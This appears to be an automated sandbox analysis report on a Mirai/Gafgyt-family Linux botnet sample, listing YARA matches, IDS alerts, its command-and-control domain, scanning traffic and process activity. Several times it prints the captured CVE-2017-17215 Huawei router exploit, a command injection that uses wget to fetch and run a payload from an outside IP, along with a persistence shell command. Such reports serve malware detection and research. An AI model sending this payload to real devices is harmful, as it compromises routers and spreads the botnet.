          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 67.221.244.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.208.235.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 217.24.132.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.94.22.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.173.30.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.101.218.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.119.251.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.209.149.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.182.249.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.30.119.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.183.243.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.220.89.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.25.145.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.123.1.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.133.140.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.109.181.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.70.24.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.112.166.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.199.94.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.157.73.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.158.223.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.71.25.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 133.247.31.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.240.216.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.148.35.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 212.7.36.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.121.106.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.49.232.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.247.236.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.33.8.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.188.129.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 143.68.199.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 103.196.0.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.193.247.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.4.124.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.2.38.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.198.152.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 152.73.191.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.238.170.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 84.193.28.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.214.33.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.216.64.39:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.216.56.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 91.50.55.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.59.201.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 103.241.194.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.219.110.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.64.128.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.26.10.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.64.105.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.68.142.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.145.3.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.114.41.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.186.168.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.226.100.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.252.41.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.127.206.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.17.215.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.16.61.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.208.211.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.70.196.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.57.208.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.211.83.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.199.154.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 162.125.103.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.215.76.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.82.230.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.176.31.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.87.173.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 173.231.242.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.128.53.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.254.103.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.144.125.224:37215
          Source: global traffic
          HTTP traffic detected:
            POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 456
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global traffic
          HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 456
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknown, TCP traffic detected without corresponding DNS query
          Source: x86_64.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86_64.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknown, HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 456
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown, DNS traffic detected: queries for: test.zxyes.xyz

          System Summary

          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_0cd591cd, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_a33a8363, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_1e0c5ce0, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
          Source: x86_64.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_a33a8363, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_1e0c5ce0, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
          Source: Process Memory Space: x86_64.elf PID: 6226, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
          Source: ELF static info symbol of initial sample, .symtab present: no
          Source: Initial sample, String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sample, String containing 'busybox' found: /bin/busybox
          Source: Initial sample, String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sample, String containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engine, Classification label: mal100.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          Source: /bin/sh (PID: 6231), Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6229), Mkdir executable: /usr/bin/mkdir -> mkdir bin@\\x9e~l\\xfc
          Source: /bin/sh (PID: 6231), Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /tmp/x86_64.elf (PID: 6227), Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6228), Rm executable: /usr/bin/rm -> rm -rf bin/watchdog
          Source: submitted sample, Stderr:
            sh: 1: cannot create bin/watchdog: Directory nonexistent
            chmod: cannot access 'bin/watchdog': No such file or directory: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          Source: unknown, Network traffic detected: HTTP traffic on port 59722 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 59722
          Source: unknown, Network traffic detected: HTTP traffic on port 48448 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 48448
          Source: unknown, Network traffic detected: HTTP traffic on port 53138 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 53138
          Source: unknown, Network traffic detected: HTTP traffic on port 46886 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 46886
          Source: unknown, Network traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 47404 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 43420 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 55010 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 45848 -> 37215
          Source: unknown, Network traffic detected: HTTP traffic on port 55956 -> 37215

          Stealing of Sensitive Information

          Source: Yara match, File source: x86_64.elf, type: SAMPLE
          Source: Yara match, File source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: x86_64.elf, type: SAMPLE
          Source: Yara match, File source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | Path Interception | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          No configs have been found
          [Behavior graph: ID 830862, Sample: x86_64.elf, Startdate: 20/03/2023, Architecture: LINUX, Score: 100. Network nodes: test.zxyes.xyz; 197.186.143.240, 37215 (airtel-tz-asTZ, Tanzania United Republic of); 99 other IPs or domains. Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures. Process tree: x86_64.elf started sh and a child x86_64.elf; sh started chmod, rm and mkdir; the child x86_64.elf started two further x86_64.elf processes. Signature on chmod: Sets full permissions to files and/or directories.]
          Source | Detection | Scanner | Label | Link
          x86_64.elf | 54% | ReversingLabs | Linux.Trojan.Gafgyt |
          x86_64.elf | 62% | Virustotal | | Browse
          x86_64.elf | 100% | Joe Sandbox ML | |

          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          test.zxyes.xyz | 2% | Virustotal | | Browse

          No Antivirus matches

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          test.zxyes.xyz | 195.133.40.202 | true | true | | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/soap/encoding/ | x86_64.elf | false | | high
          http://schemas.xmlsoap.org/soap/envelope/ | x86_64.elf | false | | high
              No context
              No created / dropped files found
              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.2742321349280346
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:x86_64.elf
              File size:63296
              MD5:31bc5e9f752e5b6bbd24544e54142086
              SHA1:2a2cfe59b83fb19829cc19fe1dfbc7d6cd6b57ff
              SHA256:334de74bf734a40b9a1d9b9f8fc9b694bd3ae544d99c09a7e5dd400d5cf3343b
              SHA512:26deee18cdbb7c4f9f359c1959d308378ad6fd294952573504bc4cd7f7e3476c9a9974250808240681e527389e062d9eaa5cc6c369613d493b0031e8a132e02d
              SSDEEP:1536:dpmbSQ6U3q7cCBT/lZsK/0DiQyLiKimfFoktCe3fYRMI:WShU3q7cEDlCK/0DK9i8Fok06fYRz
              TLSH:4D534B17B58280FDC09AC1744B2BBA3AD93775FD0378B2A677D0EB222CA6D211E1DD44

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:
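              Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
               | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
              .init | PROGBITS | 0x4000e8 | 0xe8 | 0x13 | 0x0 | 0x6 | AX | 0 | 0 | 1
              .text | PROGBITS | 0x400100 | 0x100 | 0xc866 | 0x0 | 0x6 | AX | 0 | 0 | 16
              .fini | PROGBITS | 0x40c966 | 0xc966 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 1
              .rodata | PROGBITS | 0x40c980 | 0xc980 | 0x2390 | 0x0 | 0x2 | A | 0 | 0 | 32
              .ctors | PROGBITS | 0x50f000 | 0xf000 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
              .dtors | PROGBITS | 0x50f010 | 0xf010 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
              .data | PROGBITS | 0x50f040 | 0xf040 | 0x440 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .bss | NOBITS | 0x50f480 | 0xf480 | 0x2a10 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .shstrtab | STRTAB | 0x0 | 0xf480 | 0x3e | 0x0 | 0x0 | | 0 | 0 | 1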
              Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
              LOAD | 0x0 | 0x400000 | 0x400000 | 0xed10 | 0xed10 | 6.4015 | 0x5 | R E | 0x100000 | | .init .text .fini .rodata
              LOAD | 0xf000 | 0x50f000 | 0x50f000 | 0x480 | 0x2e90 | 2.1644 | 0x6 | RW | 0x100000 | | .ctors .dtors .data .bss
              GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 | |
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              03/20/23-18:45:24.095464 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 59722 | 37215 | 192.168.2.23 | 41.237.57.24
              03/20/23-18:46:43.951969 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 55010 | 37215 | 192.168.2.23 | 34.117.60.121
              03/20/23-18:46:49.166628 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 55956 | 37215 | 192.168.2.23 | 172.87.207.26
              03/20/23-18:45:18.014810 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 36176 | 56999 | 192.168.2.23 | 195.133.40.202
              03/20/23-18:47:20.158707 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 36176 | 195.133.40.202 | 192.168.2.23
              03/20/23-18:46:43.953554 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 45848 | 37215 | 192.168.2.23 | 34.120.62.25
              03/20/23-18:46:40.914230 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 43420 | 37215 | 192.168.2.23 | 147.146.246.207
              03/20/23-18:45:35.250142 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 48448 | 37215 | 192.168.2.23 | 41.44.217.38
              03/20/23-18:45:47.393680 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 53138 | 37215 | 192.168.2.23 | 41.47.127.89
              03/20/23-18:46:09.990245 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 46886 | 37215 | 192.168.2.23 | 197.246.253.72
              03/20/23-18:46:40.895758 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 47404 | 37215 | 192.168.2.23 | 65.121.182.204
              03/20/23-18:46:11.261546 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 55138 | 37215 | 192.168.2.23 | 154.211.39.154
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Mar 20, 2023 18:45:17.965209961 CET | 192.168.2.23 | 8.8.8.8 | 0x9e33 | Standard query (0) | test.zxyes.xyz | A (IP address) | IN (0x0001) | false

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Mar 20, 2023 18:45:17.987369061 CET | 8.8.8.8 | 192.168.2.23 | 0x9e33 | No error (0) | test.zxyes.xyz |  | 195.133.40.202 | A (IP address) | IN (0x0001) | false

              System Behavior

              Start time: 18:45:16
              Start date: 20/03/2023
              Path: /tmp/x86_64.elf
              Arguments: /tmp/x86_64.elf
              File size: 63296 bytes
              MD5 hash: 31bc5e9f752e5b6bbd24544e54142086

              Start time: 18:45:16
              Start date: 20/03/2023
              Path: /tmp/x86_64.elf
              Arguments: n/a
              File size: 63296 bytes
              MD5 hash: 31bc5e9f752e5b6bbd24544e54142086

              Start time: 18:45:16
              Start date: 20/03/2023
              Path: /bin/sh
              Arguments: sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
              File size: 129816 bytes
              MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

              Start time: 18:45:16
              Start date: 20/03/2023
              Path: /bin/sh
              Arguments: n/a
              File size: 129816 bytes
              MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

              Start time: 18:45:16
              Start date: 20/03/2023
              Path: /usr/bin/rm
              Arguments: rm -rf bin/watchdog
              File size: 72056 bytes
              MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /bin/sh
              Arguments: n/a
              File size: 129816 bytes
              MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /usr/bin/mkdir
              Arguments: mkdir bin@\\x9e~l\\xfc
              File size: 88408 bytes
              MD5 hash: 088c9d1df5a28ed16c726eca15964cb7

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /bin/sh
              Arguments: n/a
              File size: 129816 bytes
              MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /usr/bin/chmod
              Arguments: chmod 777 bin/watchdog
              File size: 63864 bytes
              MD5 hash: 739483b900c045ae1374d6f53a86a279

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /tmp/x86_64.elf
              Arguments: n/a
              File size: 63296 bytes
              MD5 hash: 31bc5e9f752e5b6bbd24544e54142086

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /tmp/x86_64.elf
              Arguments: n/a
              File size: 63296 bytes
              MD5 hash: 31bc5e9f752e5b6bbd24544e54142086

              Start time: 18:45:17
              Start date: 20/03/2023
              Path: /tmp/x86_64.elf
              Arguments: n/a
              File size: 63296 bytes
              MD5 hash: 31bc5e9f752e5b6bbd24544e54142086